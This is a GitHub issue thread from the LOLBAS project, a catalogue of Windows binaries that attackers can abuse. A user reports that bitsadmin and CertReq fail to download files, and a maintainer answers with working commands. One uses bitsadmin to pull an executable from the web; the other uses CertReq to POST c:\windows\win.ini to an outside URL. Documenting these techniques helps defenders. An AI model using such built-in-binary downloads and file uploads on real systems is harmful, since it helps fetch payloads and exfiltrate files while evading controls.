### ISSUE TITLE
Bitsadmin.exe, CertReq.exe don't work for downloading

### ISSUE THREAD

**Issue by MohamedKarrab** [LOLBAS-Project/LOLBAS#380]
Bitsadmin.exe, CertReq.exe don't work for downloading

OS Name:                   Microsoft Windows Server 2016 Standard
OS Version:                10.0.14393 N/A Build 14393

**Comment by wietze** [comment]
For `bitsadmin`, can you try the following:
```bat
bitsadmin /transfer myDownloadJob /download /priority normal https://live.sysinternals.com/autoruns.exe c:\users\%USERNAME%\desktop\output2.exe
```

For `certreq.exe`, the following command as states on the corresponding LOLBAS page does work for me:
```bat
CertReq -Post -config https://example.org/ c:\windows\win.ini output.txt
```
bear in mind that it makes a POST request to the specified URL (uploading the file specified in the path afterward) and putting the response in the file specified as final argument.

**Comment by wietze** [comment]
I'm closing this issue for now, please feel free to reopen if you're of the opinion the LOLBAS entries need changing. Thanks
